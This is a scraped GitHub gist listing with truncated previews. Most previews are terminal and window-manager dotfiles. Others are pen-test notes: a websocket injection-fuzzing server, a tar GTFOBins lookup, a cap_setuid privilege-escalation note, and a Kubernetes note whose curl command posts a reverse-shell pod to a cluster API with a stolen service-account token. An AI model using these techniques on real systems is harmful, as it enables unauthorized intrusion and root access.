This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# ws_inj_server.py | |
# @dualfade | |
# inspired by -- | |
# https://bit.ly/3FCA1I4 | |
""" | |
Tunnel SocketServer() to websocket() JSON inj-- | |
sqli / nosqli / fuzz -- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[2] % gtfo -b tar | |
_ _ _ __ | |
_| || |_ | | / _| | |
|_ __ _| __ _| |_| |_ ___ | |
_| || |_ / _` | __| _/ _ \ | |
|_ __ _| | (_| | |_| || (_) | | |
|_||_| \__, |\__|_| \___/ | |
__/ | | |
|___/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BlackArch / ArchLinux Latest -- | |
Docker UFW issues -- | |
## This is not working anymore with docker-compose -- | |
## see below -- | |
docker.json update -- | |
% cat /etc/docker/daemon.json | |
{ | |
"iptables": false |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# spacevim pissing me off -- | |
# moving to neovim-init / blackarch -- | |
# orig -- | |
# https://github.com/Optixal/neovim-init.vim | |
# refs -- | |
# https://github.com/neoclide/coc.nvim | |
# https://github.com/VundleVim/Vundle.vim | |
Note: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Post request to cluster -- | |
Most articles talked about using "default" as the namespace; | |
this target needed a very specific namespace to be used because of the token and privileges. | |
% curl -sk -v -H 'Authorization: Bearer eyJhbHbiOiJSUzI1NiIsImtpZCI6InpR[full_jwt]4bGRe83bt6f_jPs1RXMKt3RnQd5ugveZfw' 'https://poc.somehackeddomain.com:6443/api/v1/namespaces/HACKED_NAMESPACE/pods' -H 'Content-Type: application/json' -d @5h3ll3x.json | |
yaml pod template -- | |
Convert to json for proper injection -- | |
Obviously you have to have enough privileges to use hostPath -- | |
This particular pen-test aws was breached compromising the kube-system jwt and then the json reverse shell was |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# GNU Screen - main configuration file | |
# Allow bold colors - necessary for some reason | |
attrcolor b ".I" | |
# Tell screen how to set colors. AB = background, AF=foreground | |
termcapinfo xterm 'Co#256:AB=\E[48;5;%dm:AF=\E[38;5;%dm' | |
# Enables use of shift-PgUp and shift-PgDn | |
termcapinfo xterm|xterms|xs|rxvt ti@:te@ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ~/.config/termite/config | |
[options] | |
allow_bold = true | |
font = Hack Nerd Font 8 | |
icon_name = termite | |
scrollback_lines = 10000 | |
[colors] | |
foreground = #c0c5ce |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
file with cap_setuid+ep ?? | |
user with perms to make it so == root | |
Just some notes -- | |
[user@lemur tmp]$ hostname ; id | |
lemur | |
uid=1001(user) gid=1001(user) groups=1001(user) | |
[user@lemur tmp]$ sudo -l | |
Matching Defaults entries for user on this host: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Disable std modkey r -- | |
enable rofi -- | |
-- Prompt | |
-- awful.key({ modkey }, "r", function () mypromptbox[mouse.screen.index]:run() end), | |
-- Run program (d for dmenu ;) | |
awful.key({ modkey }, "d", | |
function() | |
awful.spawn.with_shell("rofi -matching fuzzy -show combi") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ~/.config/termite/config | |
[options] | |
allow_bold = true | |
clickable_url = true | |
font = Hack Nerd Font 8 | |
geometry = 700x520 | |
icon_name = terminal | |
scrollback_lines = 10000 | |
browser = lynx |